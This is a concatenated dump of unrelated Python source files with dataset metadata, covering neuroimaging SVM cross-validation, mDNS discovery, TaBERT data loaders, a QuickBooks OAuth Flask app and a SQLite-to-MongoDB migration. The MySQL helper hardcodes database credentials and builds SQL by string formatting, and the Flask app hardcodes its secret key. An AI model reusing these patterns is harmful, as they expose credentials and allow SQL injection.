pd.DataFrame([[\"svm\"] + list(scores_svm.values())], columns=[\"method\"] + list(scores_svm.keys()))\n\n with pd.ExcelWriter(results_filename()) as writer:\n scores_refit.to_excel(writer, sheet_name='cv_by_param', index=False)\n scores_dcv_byparams.to_excel(writer, sheet_name='cv_cv_byparam', index=False)\n scores_argmax_byfold.to_excel(writer, sheet_name='cv_argmax', index=False)\n scores_cv.to_excel(writer, sheet_name='dcv', index=False)\n\n##############################################################################\n\nif __name__ == \"__main__\":\n INPUT_DATA_X = '/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/data/mean_centered_by_site_all/X.npy'\n INPUT_DATA_y = '/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/data/mean_centered_by_site_all/y.npy'\n INPUT_MASK_PATH = '/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/data/mean_centered_by_site_all/mask.npy'\n\n\n NFOLDS_OUTER = 4 # 4 datasets\n NFOLDS_INNER = 5\n\n site = np.load(\"/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/data/site.npy\")\n\n\n\n shutil.copy(INPUT_DATA_X, WD)\n shutil.copy(INPUT_DATA_y, WD)\n shutil.copy(INPUT_MASK_PATH, WD)\n #############################################################################\n ## Create config file\n y = np.load(INPUT_DATA_y)\n\n cv_outer = [[tr, te] for tr,te in StratifiedKFold(y.ravel(), n_folds=NFOLDS_OUTER, random_state=42)]\n cv_outer[0][0] = np.transpose(np.where(site != 1)).ravel()\n cv_outer[0][1] = np.transpose(np.where(site == 1)).ravel() #CV00 TEST ON COBRE\n\n cv_outer[1][0] = np.transpose(np.where(site != 2)).ravel()\n cv_outer[1][1] = np.transpose(np.where(site == 2)).ravel() #CV01 TEST ON NMORPHch\n\n cv_outer[2][0] = np.transpose(np.where(site != 3)).ravel()\n cv_outer[2][1] = np.transpose(np.where(site == 3)).ravel() #CV02 TEST ON NUSDAST\n\n cv_outer[3][0] = np.transpose(np.where(site != 4)).ravel()\n cv_outer[3][1] = np.transpose(np.where(site == 4)).ravel() #CV03 TEST ON VIP\n\n\n cv_outer[0][0] = cv_outer[0][0][:int(np.around(len(cv_outer[0][0])*0.6))]\n cv_outer[1][0] = cv_outer[1][0][:int(np.around(len(cv_outer[1][0])*0.6))]\n cv_outer[2][0] = cv_outer[2][0][:int(np.around(len(cv_outer[2][0])*0.6))]\n cv_outer[3][0] = cv_outer[3][0][:int(np.around(len(cv_outer[3][0])*0.6))]\n\n import collections\n cv = collections.OrderedDict()\n for 
cv_outer_i, (tr_val, te) in enumerate(cv_outer):\n cv[\"cv%02d/all\" % (cv_outer_i)] = [tr_val, te]\n cv_inner = StratifiedKFold(y[tr_val].ravel(), n_folds=NFOLDS_INNER, random_state=42)\n for cv_inner_i, (tr, val) in enumerate(cv_inner):\n cv[\"cv%02d/cvnested%02d\" % ((cv_outer_i), cv_inner_i)] = [tr_val[tr], tr_val[val]]\n for k in cv:\n cv[k] = [cv[k][0].tolist(), cv[k][1].tolist()]\n\n\n C_range = [[100],[10],[1],[1e-1],[1e-2],[1e-3],[1e-4],[1e-5],[1e-6],[1e-7],[1e-8],[1e-9]]\n\n\n user_func_filename = \"/home/ad247405/git/scripts/2016_schizConnect/supervised_analysis/all_studies+VIP/all_subjects/Freesurfer/learning_curve_ratio_centered_by_site_all/inter_site/svm_ratio_0_6.py\"\n\n config = dict(data=dict(X=\"X.npy\", y=\"y.npy\"),\n params=C_range, resample=cv,\n structure=\"mask.npy\",\n map_output=\"model_selectionCV\",\n user_func=user_func_filename,\n reduce_input=\"results/*/*\",\n reduce_group_by=\"params\",\n reduce_output=\"model_selectionCV.csv\")\n json.dump(config, open(os.path.join(WD, \"config_dCV.json\"), \"w\"))\n\n\n # Build utils files: sync (push/pull) and PBS\n import brainomics.cluster_gabriel as clust_utils\n sync_push_filename, sync_pull_filename, WD_CLUSTER = \\\n clust_utils.gabriel_make_sync_data_files(WD)\n cmd = \"mapreduce.py --map %s/config_dCV.json\" % WD_CLUSTER\n clust_utils.gabriel_make_qsub_job_files(WD, cmd)\n","sub_path":"2016_schizConnect/supervised_analysis/all_studies+VIP/all_subjects/Freesurfer/learning_curve_ratio_centered_by_site_all/inter_site/svm_ratio_0_6.py","file_name":"svm_ratio_0_6.py","file_ext":"py","file_size_in_byte":14054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"161256436","text":"from zeroconf import ServiceBrowser, Zeroconf\nimport socket\nimport time\n\nTYPE = \"_mesh-http._tcp.local.\"\n\nclass ServiceListener(object):\n def __init__(self):\n self.ips = []\n self.props = []\n\n def remove_service(self, zeroconf, type, name):\n print(\"Service %s removed\" % (name,))\n\n def add_service(self, zeroconf, type, name):\n info = zeroconf.get_service_info(type, name)\n #print(\"Service %s added, service info: %s\" % (name, info))\n if(info):\n self.ips.append(socket.inet_ntoa(info.address)+':'+str(info.port))\n self.props.append(info.properties)\n\ndef getIps(timeout = 3):\n zc = Zeroconf()\n listener = ServiceListener()\n brower = ServiceBrowser(zc, TYPE, listener)\n time.sleep(timeout)\n zc.close()\n return (listener.ips, listener.props)\n\n\nif __name__ == '__main__':\n ip, prop = getIps()\n print(ip, prop)\n","sub_path":"mdns.py","file_name":"mdns.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"57800049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : pureoym\n# @Contact : pureoym@163.com\n# @TIME : 2018/9/29 16:18\n# @File : io_utils.py\n# Copyright 2017 pureoym. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ========================================================================\n\nimport pymysql\nfrom importlib import reload\nimport sys\nimport weibo_utils\n\n\ndef write_to_mysql(line, logger):\n conf = {'host': '10.10.65.231',\n 'user': 'ai',\n 'passwd': 'ai_123',\n 'db': 'AI',\n 'port': 3306, }\n conn = get_mysql_conn(conf, logger)\n import sys\n reload(sys)\n if line:\n record = weibo_utils.get_weibo_data_from_log(line)\n # print(record)\n try:\n # [weibo_id, weibo_url, contents, zan, transfer, comment, pics, publish_time, crawl_time, account_id, from_account_id, from_weibo_id]\n weibo_id = record[0]\n weibo_url = record[1]\n contents = record[2].replace('\\\"', '\\\\\"')\n zan = record[3]\n transfer = record[4]\n comment = record[5]\n pic_url = record[6]\n publish_time = record[7]\n crawl_time = record[8]\n account_id = record[9]\n from_account_id = record[10]\n from_weibo_id = record[11]\n sql = 'REPLACE INTO weibo_data(weibo_id, weibo_url, contents, zan, transfer, comment, pic_url, publish_time, crawl_time, account_id, from_account_id, from_weibo_id)' \\\n 'VALUES (\"%s\", \"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")' \\\n % (weibo_id, weibo_url, contents, zan, transfer, comment, pic_url, publish_time, crawl_time,\n account_id, from_account_id, from_weibo_id)\n execute_my_sql(conn, sql, logger)\n logger.info('Submitted record, weibo ID=' + weibo_id)\n except Exception as e:\n logger.error(e)\n logger.error(record)\n\n\ndef get_mysql_conn(conf, logger):\n '''\n Establish a MySQL connection\n :param conf:\n :return:\n '''\n try:\n conn = pymysql.connect(host=conf['host'],\n user=conf['user'],\n passwd=conf['passwd'],\n db=conf['db'],\n port=conf['port'],\n charset=\"utf8\")\n # logger.debug('mysql connection established')\n except Exception as e:\n logger.error(e)\n sys.exit()\n return conn\n\n\ndef execute_my_sql(conn, sql, logger):\n '''\n Execute a SQL statement\n :param conn:\n :param sql:\n :return:\n '''\n cursor = conn.cursor()\n try:\n cursor.execute(sql)\n conn.commit()\n except pymysql.Error as e:\n conn.rollback()\n logger.error(e)\n\n\ndef execute_sql_and_get_result(conn, sql, logger):\n '''\n Execute a SQL statement\n :param conn:\n :param sql:\n :return:\n '''\n cursor = conn.cursor()\n try:\n cursor.execute(sql)\n conn.commit()\n return\n except pymysql.Error as e:\n conn.rollback()\n logger.error(e)","sub_path":"io_utils.py","file_name":"io_utils.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"577637182","text":"import itertools\nimport json\nimport os\nimport random\nfrom math import ceil\nfrom collections import defaultdict\nfrom pathlib import Path\nimport re\n\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom table_bert import Table, Column, TableBertModel\n\n\n# html_pattern = re.compile(r'<\\w+ [^>]*>([^<]+)</\\w+>')\n# tag_pattern = re.compile(r'<.*?>')\n# link_pattern = 
re.compile(r'\\[.*?\\|.*?\\]')\n\n\n# def get_negative_rank(path=Path('.data/bench/1/rel0_rank'), threshold=0.0811):\n# rank_dict = {}\n# with open(path, 'r') as f:\n# lines = f.readlines()[:3200]\n# for line in lines:\n# qid, rel, tid, overlap_ratio = line.split('\\t')\n# if float(overlap_ratio) >= threshold:\n# try:\n# rank_dict[qid].append(tid)\n# except:\n# rank_dict[qid] = [tid]\n# return rank_dict\n\n\ndef encode_tables(table_json, is_slice, query, table_tokenizer, min_row):\n rel = table_json['rel']\n tid = table_json['table']['tid']\n\n raw_json = json.loads(table_json['table']['raw_json'])\n textBeforeTable = raw_json['textBeforeTable'] # 추후\n textAfterTable = raw_json['textAfterTable'] # 추후\n\n title = raw_json['pageTitle']\n # caption = re.sub(r'[^a-zA-Z0-9]', ' ', raw_json['title']).strip() # Caption 역할\n caption = raw_json['title'].strip() # Caption 역할\n tableOrientation = raw_json['tableOrientation'].strip() # [HORIZONTAL, VERTICAL]\n\n headerPosition = raw_json['headerPosition'] # ['FIRST_ROW', 'MIXED', 'FIRST_COLUMN', 'NONE’]\n hasHeader = raw_json['hasHeader'] # [true, false]\n keyColumnIndex = raw_json['keyColumnIndex']\n headerRowIndex = raw_json['headerRowIndex'] # 0 == 첫줄, -1 == 없음\n entities = raw_json['entities']\n\n body = raw_json['relation']\n if tableOrientation == \"HORIZONTAL\":\n body = list(map(list, zip(*body))) # transpose\n\n header = body[headerRowIndex] if hasHeader else [''] * len(body[0])\n # Heading preprocessing + link remove\n # heading_str = ' '.join(heading)\n # if html_pattern.search(heading_str):\n # if link_pattern.search(heading_str): # 같이 있는 경우\n # heading = [re.sub(tag_pattern, '', column).strip() for column in heading]\n # for idx, column in enumerate(heading):\n # if link_pattern.search(column):\n # real_text = link_pattern.search(column).group().split('|')[-1][:-1].strip()\n # heading[idx] = real_text\n # else:\n # heading = [re.sub(html_pattern, '', column).strip() for column in heading]\n\n # Row preporcessing + link remove\n # cell_sum_str = ''\n # for rows in body:\n # cell_sum_str += ' '.join(rows)\n # cell_sum_str = ' '.join([row for rows in body])\n\n # if html_pattern.search(cell_sum_str):\n # if link_pattern.search(cell_sum_str): # 같이 있으면\n # for i, rows in enumerate(body):\n # for j, cell in enumerate(rows):\n # if link_pattern.search(cell):\n # cell = re.sub(tag_pattern, '', cell).strip()\n # real_text = link_pattern.search(cell).group().split('|')[-1][:-1]\n # body[i][j] = real_text\n # else:\n # cell = re.sub(html_pattern, '', cell).strip()\n # body[i][j] = cell\n\n # else:\n # row_list = []\n # for rows in body:\n # row_list.append([re.sub(html_pattern, '', row).strip() for row in rows])\n # body = row_list\n\n # caption = caption if caption else title\n context = f'{title} {caption}'.strip()\n context_rep = table_tokenizer.tokenize(context)\n\n if is_slice:\n table_reps = slice_table(tid, header, body, table_tokenizer, min_row)\n else:\n table_reps = [Table(id=tid,\n header=[Column(h.strip(), infer_column_type(h)) for h in header],\n data=body\n ).tokenize(table_tokenizer)]\n\n # memory issues!\n if len(table_reps) > 5:# \n table_reps = table_reps[:5]\n\n return table_reps, context_rep\n\n\ndef slice_table(tid, heading, data, table_tokenizer, min_row):\n table_reps = []\n\n for i in range(0, len(data), min_row):\n rows = data[i:i+min_row]\n table_rep = Table(id=f'{tid}_{i}',\n header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n data=rows\n ).tokenize(table_tokenizer)\n table_reps.append(table_rep)\n\n # if 
# if len(data) <= min_row: # table smaller than the minimum row count\n# column_rep = Table(id=title,\n# header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n# data=data\n# ).tokenize(table_tokenizer)\n# table_rep_list.append(column_rep)\n# else:\n# row_n = max(min_row, ceil(len(data) / max_table))\n# slice_row_data = [data[i * row_n:(i + 1) * row_n] for i in range((len(data) + row_n - 1) // row_n)]\n# for rows in slice_row_data:\n# column_rep = Table(id=title,\n# header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n# data=rows\n# ).tokenize(table_tokenizer)\n# table_rep_list.append(column_rep)\n\n # row_n = max(min_row, ceil(len(data) / max_table_nums))\n # slice_row_data = [data[i * row_n:(i + 1) * row_n] for i in range((len(data) + row_n - 1) // row_n)]\n # if rel == 0: # Negative\n # for rows in slice_row_data:\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), infer_column_type(h)) for h in heading],\n # data=rows\n # ).tokenize(table_tokenizer)\n # table_rep_list.append((rel, column_rep))\n\n # else: # Positive\n # query_tokens = [token.strip() for token in query.split(' ')]\n # is_always_postive = False\n # for token in query_tokens:\n # if token in caption:\n # is_always_postive = True\n # break\n\n # if is_always_postive: # a query token appears in the caption\n # for rows in slice_row_data:\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), 'text') for h in heading],\n # data=rows\n # ).tokenize(table_tokenizer)\n # table_rep_list.append((rel, column_rep))\n # else:\n # for rows in slice_row_data:\n # column_rep = Table(id=title,\n # header=[Column(h.strip(), 'text') for h in heading],\n # data=rows\n # ).tokenize(table_tokenizer)\n # modify_rel = '0'\n # # join the row data into a single string\n # cell_string_sum = ''\n # for row in rows:\n # cell_string_sum += ' '.join(row)\n # # overlap with the query tokens\n # for token in query_tokens:\n # if token in cell_string_sum:\n # modify_rel = '1'\n # break\n # table_rep_list.append((modify_rel, column_rep))\n\n\nclass QueryTableDataset(Dataset):\n def __init__(self, data_dir: str = '.data', data_type: str = 'train',\n query_tokenizer=None, table_tokenizer=None, max_query_length=7,\n min_row=30, prepare=False, is_slice=True):\n self.data_dir = data_dir\n self.ids_file = f'{data_type}_{min_row}.pair'\n self.data_type = data_type\n self.is_slice = is_slice\n if prepare:\n self.prepare(data_dir, data_type, query_tokenizer, table_tokenizer, max_query_length, min_row=min_row)\n\n self.data = torch.load(os.path.join(self.processed_folder, self.ids_file))\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n return self.data[index]\n\n def prepare(self, data_dir, data_type, query_tokenizer, table_tokenizer, max_query_length, min_row):\n if self._check_exists():\n return\n\n processed_dir = Path(self.processed_folder)\n processed_dir.mkdir(exist_ok=True)\n if not (query_tokenizer and table_tokenizer):
 raise RuntimeError('Tokenizers are not found.' +\n ' You must set query_tokenizer and table_tokenizer')\n print('Processing...')\n\n query_dict = defaultdict()\n data = []\n path = Path(data_dir + '/' + data_type + '.jsonl')\n\n with open(path) as f:\n for line in f.readlines():\n if not line.strip():\n break\n\n # parse the table's basic metadata\n jsonStr = json.loads(line)\n tableId = jsonStr['docid'] # tableId -> tid\n query = jsonStr['query']\n qid = jsonStr['qid']\n rel = jsonStr['rel']\n\n if qid not in query_dict:\n query_tokenized = query_tokenizer.encode_plus(query,\n max_length=max_query_length,\n padding='max_length',\n truncation=True,\n return_tensors=\"pt\"\n )\n query_dict[qid] = query_tokenized\n\n table_reps, caption_rep = encode_tables(jsonStr, self.is_slice, query, table_tokenizer, min_row)\n # (Q, Pos_Table, Neg_Table)\n rel = 1 if rel > 0 else 0\n data.append((query_dict[qid], table_reps, [caption_rep] * len(table_reps), rel))\n\n # Save\n with open(os.path.join(processed_dir, self.ids_file), 'wb') as f:\n torch.save(data, f)\n print('Done!')\n\n @property\n def processed_folder(self):\n return os.path.join(self.data_dir, 'processed')\n\n def _check_exists(self):\n return os.path.exists(os.path.join(self.processed_folder, self.ids_file))\n\n\ndef query_table_collate_fn(batch):\n query, tables, caption, rel = zip(*batch)\n input_ids, token_type_ids, attention_mask = [], [], []\n for q in query:\n input_ids.append(q[\"input_ids\"].squeeze())\n token_type_ids.append(q[\"token_type_ids\"].squeeze())\n attention_mask.append(q[\"attention_mask\"].squeeze())\n\n query = {\"input_ids\": torch.stack(input_ids),\n \"token_type_ids\": torch.stack(token_type_ids),\n \"attention_mask\": torch.stack(attention_mask)}\n\n return query, tables, caption, torch.Tensor(rel)\n\n\ndef infer_column_type(value):\n if not value:\n return ''\n elif value.replace('.','').replace(',','').replace('-','').isdigit():\n return 'real'\n return 'text'
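\n\n# A quick, illustrative sanity check of infer_column_type as defined above;\n# '.', ',' and '-' are stripped before the digit test, so dash-joined digits\n# also come back as 'real' (the sample values here are made up):\nif __name__ == '__main__':\n    assert infer_column_type('') == ''\n    assert infer_column_type('1,234.5') == 'real'\n    assert infer_column_type('2-3-4') == 'real'\n    assert infer_column_type('abc') == 'text'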
class TableDataset(Dataset):\n def __init__(self, data_dir: str = '.data', data_type: str = 'test', table_tokenizer=None, \n min_row=10, prepare=False, is_slice=True):\n self.data_dir = data_dir\n self.table_file = f'{data_type}_{min_row}.table'\n self.is_slice = is_slice\n\n if prepare:\n self.prepare(data_type, table_tokenizer, min_row)\n\n self.tables = torch.load(os.path.join(self.processed_folder, self.table_file))\n\n def __len__(self):\n return len(self.tables)\n\n def __getitem__(self, index):\n return self.tables[index]\n\n def prepare(self, data_type, table_tokenizer, min_row):\n if self._check_exists():\n return\n\n processed_dir = Path(self.processed_folder)\n processed_dir.mkdir(exist_ok=True)\n if not table_tokenizer:\n raise RuntimeError('Tokenizers are not found.' +\n ' You must set table_tokenizer')\n # print('Processing...')\n\n tables = []\n path = Path(self.data_dir + '/' + data_type + '.jsonl')\n\n with open(path) as f:\n for line in f.readlines():\n if not line.strip():\n break\n\n # parse the table's basic metadata\n jsonStr = json.loads(line)\n tableId = jsonStr['docid'] # tableId -> tid\n query = jsonStr['query']\n qid = jsonStr['qid']\n rel = jsonStr['rel']\n\n # Table Encode\n table_reps, caption_rep = encode_tables(jsonStr, self.is_slice, query, table_tokenizer, min_row)\n tables.append((f\"{tableId}\", table_reps, [caption_rep] * len(table_reps)))\n\n # Save\n with open(os.path.join(processed_dir, self.table_file), 'wb') as f:\n torch.save(tables, f)\n\n @property\n def processed_folder(self):\n return os.path.join(self.data_dir, 'processed')\n\n def _check_exists(self):\n return os.path.exists(os.path.join(self.processed_folder, self.table_file))\n\n\ndef table_collate_fn(batch):\n tid, tables, caption = zip(*batch)\n return tid, tables, caption\n\n\nclass QueryDataset(Dataset):\n def __init__(self, data_dir: str = '.data', data_type: str = 'test', query_tokenizer=None, \n max_query_length=7, prepare=False):\n self.data_dir = data_dir\n self.query_file = data_type + '.query'\n\n if prepare:\n self.prepare(data_type, query_tokenizer, max_query_length)\n\n self.queries = torch.load(os.path.join(self.processed_folder, self.query_file))\n\n def __len__(self):\n return len(self.queries)\n\n def __getitem__(self, index):\n return self.queries[index]\n\n def prepare(self, data_type, query_tokenizer, max_query_length):\n if self._check_exists():\n return\n\n processed_dir = Path(self.processed_folder)\n processed_dir.mkdir(exist_ok=True)\n if not query_tokenizer:\n raise RuntimeError('Tokenizers are not found.' +\n ' You must set query_tokenizer')\n print('Processing...')\n query_dict = dict()\n path = Path(self.data_dir + '/' + data_type + '.jsonl')\n\n with open(path) as f:\n for line in f.readlines():\n if not line.strip():\n break\n\n # parse the query's basic metadata\n jsonStr = json.loads(line)\n query = jsonStr['query']\n qid = jsonStr['qid']\n\n if qid not in query_dict:\n query_tokenized = query_tokenizer.encode_plus(query,\n max_length=max_query_length,\n padding='max_length',\n truncation=True,\n return_tensors=\"pt\"\n )\n query_dict[qid] = query_tokenized # BERT inputs: input_ids, token_type_ids, attention_mask\n\n queries = list(query_dict.items())\n # Save\n with open(os.path.join(processed_dir, self.query_file), 'wb') as f:\n torch.save(queries, f)\n print('Done!')\n\n @property\n def processed_folder(self):\n return os.path.join(self.data_dir, 'processed')\n\n def _check_exists(self):\n return os.path.exists(os.path.join(self.processed_folder, self.query_file))\n\n\ndef query_collate_fn(batch):\n qid, query = zip(*batch)\n\n input_ids, token_type_ids, attention_mask = [], [], []\n for q in query:\n input_ids.append(q[\"input_ids\"].squeeze())\n token_type_ids.append(q[\"token_type_ids\"].squeeze())\n attention_mask.append(q[\"attention_mask\"].squeeze())\n\n query = {\"input_ids\": torch.stack(input_ids),\n \"token_type_ids\": torch.stack(token_type_ids),\n \"attention_mask\": torch.stack(attention_mask)}\n\n return qid, query\n\n\nif __name__ == \"__main__\":\n table_model = TableBertModel.from_pretrained('model/tabert_base_k3/model.bin')\n query_tokenizer = table_model.tokenizer\n table_tokenizer = table_model.tokenizer\n\n dataset = QueryTableDataset(data_dir='data/1',\n data_type='train',\n query_tokenizer=query_tokenizer,\n table_tokenizer=table_tokenizer,
prepare=True,\n )\n dataloader = DataLoader(dataset,\n batch_size=2,\n collate_fn=query_table_collate_fn)\n\n for _ in range(1):\n for d in dataloader:\n print(d)\n break\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":18213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"626486768","text":"# This sample uses code from https://pythonhosted.org/Flask-OAuth/ for OAuth1 login with Twitter\nfrom flask import Flask, request, redirect, url_for, session, g, flash, \\\n render_template\nfrom flask_oauth import OAuth\nfrom qb import create_customer, add_customer\nimport json\nfrom utils import excel \nfrom utils import configRead\n\n# configuration\nSECRET_KEY = 'prod key'\nDEBUG = True\nfont_color = 'black'\nconsumer_tokens = configRead.get_consumer_tokens()\noauth_url = configRead.get_oauth_urls()\n\n# setup flask\napp = Flask(__name__)\napp.debug = DEBUG\napp.secret_key = SECRET_KEY\noauth = OAuth()\n\nqbo = oauth.remote_app('qbo',\n base_url=oauth_url['base_url'],\n request_token_url=oauth_url['request_token_url'],\n access_token_url=oauth_url['access_token_url'],\n authorize_url=oauth_url['authorize_url'],\n consumer_key=consumer_tokens['consumer_key'],\n consumer_secret=consumer_tokens['consumer_sec']\n)\n \n@qbo.tokengetter\ndef get_qbo_token(token=None):\n if 'qbo_token' in session:\n del session['qbo_token'] \n return session.get('qbo_token')\n \n@app.route('/')\ndef index():\n access_token = session.get('access_token')\n if access_token is None:\n return redirect(url_for('login'))\n \n access_token = access_token[0]\n global customer_list\n customer_list = excel.load_excel()\n \n return render_template('index.html', \n customer_dict=customer_list,\n title=\"QB Customer Leads\",\n text_color=font_color)
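\n\n# Note: the tokengetter above discards the stored pair before reading it back,\n# so it always yields None and every request re-runs the OAuth dance. The\n# conventional flask_oauth pattern simply returns what oauth_authorized stored;\n# an illustrative alternative (left commented out so it does not re-register):\n# @qbo.tokengetter\n# def get_qbo_token(token=None):\n#     return session.get('qbo_token')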
Error message not found.\"\n \n flash(message)\n return redirect(url_for('index'))\n \n@app.route('/login')\ndef login():\n return qbo.authorize(callback=url_for('oauth_authorized',\n next=request.args.get('next') or request.referrer or None))\n \n@app.route('/reset_session')\ndef reset_session():\n session.pop('qbo_token', None)\n session['is_authorized'] = False\n return redirect(request.referrer or url_for('index'))\n \n@app.route('/oauth-authorized')\n@qbo.authorized_handler\ndef oauth_authorized(resp):\n realm_id = str(request.args.get('realmId'))\n next_url = request.args.get('next') or url_for('index')\n if resp is None:\n flash(u'You denied the request to sign in.')\n return redirect(next_url)\n \n access_token = resp['oauth_token']\n session['access_token'] = access_token\n session['is_authorized'] = True\n session['realm_id'] = realm_id\n session['qbo_token'] = (\n resp['oauth_token'],\n resp['oauth_token_secret']\n )\n return redirect(url_for('index'))\n \nif __name__ == '__main__':\n app.run()","sub_path":"SampleApp/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"127564146","text":"\"\"\"\nInserting RPG data into mongoDB.\nQUESTION: \"How was working with MongoDB different from working with PostgreSQL? What was easier, and what was harder?\"\nANSWER: It's easier to input data with MongoDB, at least using Python. Since MongoDB takes dictionaries,\nPython's inbuilt capabilities make it relatively straightforward to convert sqlite data.\nHowever, PostgreSQL requires SQL queries, which are kind of a pain to do in Python.\nOn the other hand, retrieving/sorting/manipulating the data is easier in Postgre IMO.\nI find the relevant SQL commands more intuitive/powerful than the respective Mongo commands.\n\"\"\"\n\nimport sqlite3\nimport pymongo\nfrom password_example import password\n# Note: For the above to work, you'll have to change the\n# password in password_example to whatever your\n# mongoDB cluster's password is.\n\nclient = pymongo.MongoClient(f\"mongodb://admin:{password}@cluster0-shard-00-00-bxlcw.mongodb.net:27017,cluster0-shard-00-01-bxlcw.mongodb.net:27017,cluster0-shard-00-02-bxlcw.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true&w=majority\")\ndb = client.rpg_data\n\nconn = sqlite3.connect('rpg_db.sqlite3')\ncurs = conn.cursor()\n\n# My plan is to run a for-loop eventually, but I'll practice on a single table.\n\nquery = 'SELECT * FROM charactercreator_character;'\nrows = curs.execute(query).fetchall()\n\nfor row in rows:\n mongo_entry = {\n 'character_id': row[0],\n 'name': row[1],\n 'level': row[2],\n 'exp': row[3],\n 'hp': row[4],\n 'strength': row[5],\n 'intelligence': row[6],\n 'dexterity': row[7],\n 'wisdom': row[8]\n }\n db.charactercreator_character.insert_one(mongo_entry)\n\n# Confirm that this worked.\nprint(db.charactercreator_character.find_one())\n\n# Now we can run a for-loop. First, we need a list of all our tables.\ntables = ['charactercreator_mage', 'charactercreator_necromancer',\n 'charactercreator_thief', 'charactercreator_cleric',\n 'charactercreator_fighter', 'armory_item', 'armory_weapon',\n 'charactercreator_character_inventory']\n\n# Next is the loop. 
# Next is the loop. We'll be iterating on each table individually.\nfor table in tables:\n # First we need to know the column names.\n # We can do this through a \"PRAGMA table_info\" query.\n info_query = f'PRAGMA table_info({table});'\n table_info = curs.execute(info_query).fetchall()\n\n # The above gives us a list of tuples. The *second* entry\n # in each tuple is the column name we want.\n column_names = []\n for tup in table_info:\n column_names.append(tup[1])\n\n # Now we can do the main loop. First, get all the rows.\n row_query = f'SELECT * FROM {table};'\n table_rows = curs.execute(row_query).fetchall()\n for row in table_rows:\n mongo_entry = {}\n # The *keys* for the above dictionary are the column names,\n # and the *values* are the row entries.\n for i in range(len(column_names)):\n # We need to set up the loop this way so that each key\n # gets mapped to the proper value.\n key = column_names[i]\n value = row[i]\n mongo_entry[key] = value\n \n # And now we can finally insert the row!\n db[table].insert_one(mongo_entry)\n # Note that you have to use the bracket syntax here (db[table])\n # rather than dot syntax (db.table), since the latter would\n # create a single collection named \"table.\" The bracket syntax\n # creates a different collection for each table, with the same\n # name as the table's name.\n","sub_path":"module3-nosql-and-document-oriented-databases/insert_rpg_data.py","file_name":"insert_rpg_data.py","file_ext":"py","file_size_in_byte":3583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
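A compact equivalent of the column-name handling in insert_rpg_data.py above, for reference; the PRAGMA query and table name come from the script itself, and the zip-into-dict is just a shorter spelling of its index loop:

import sqlite3

conn = sqlite3.connect('rpg_db.sqlite3')
curs = conn.cursor()
column_names = [tup[1] for tup in curs.execute('PRAGMA table_info(armory_item);').fetchall()]
mongo_entries = [dict(zip(column_names, row)) for row in curs.execute('SELECT * FROM armory_item;')]
# each dict in mongo_entries can be passed straight to db.armory_item.insert_one(...)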
\"\"\"Function that translates french text to english \"\"\"\n if french_text is not None:\n english_text = language_translator.translate(\n text=french_text,\n model_id='fr-en').get_result()\n print(english_text['translations'][0]['translation'])\n return english_text['translations'][0]['translation']\n ","sub_path":"final_project/machinetranslation/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"407765657","text":"\ndef search_palindromes(string):\n # string expansion for handling 'out of index error'\n # when first/last letter is also a part of palindrome and loop searches for previous/next element\n string = \"~\" + string + \"~\"\n pali_list = []\n\n for i in range(1,len(string)-2):\n if string[i] == string[i+1]:\n j = 1\n while string[i-j] == string[i+j+1]:\n pali_list.append(string[i-j:i+j+2])\n j += 1\n else:\n j = 1\n while string[i-j] == string[i+j]:\n pali_list.append(string[i-j:i+j+1])\n j += 1\n return pali_list\n\n\n\nprint(search_palindromes('goddog goat dad duck doooodle neveroomoor'))","sub_path":"week-03/friday/project_part2.py","file_name":"project_part2.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"376109129","text":"# Copyright (C) 2009-2019, Panagiotis Christopoulos Charitos and contributors.\n# All rights reserved.\n# Code licensed under the BSD License.\n# http://www.anki3d.org/LICENSE\n# keep methods in alphabetical order\n\n\nimport bpy, os\nfrom bpy import context\nfrom bpy.app.translations import contexts as i18n_contexts\n# from ..libs import material_utilities\n# from ..libs import mesh_utilities\n# from ..libs import gui_utilities\n\n############################### CONSTANTS ###############################\n# MAT = material_utilities.MaterialUtilities()\n# GUI = gui_utilities.GuiUtilities()\n# MESH = mesh_utilities.MeshUtilities()\n# ico_path = \"%s/../libs/ico\" % os.path.dirname(os.path.realpath(__file__))\n# ico = 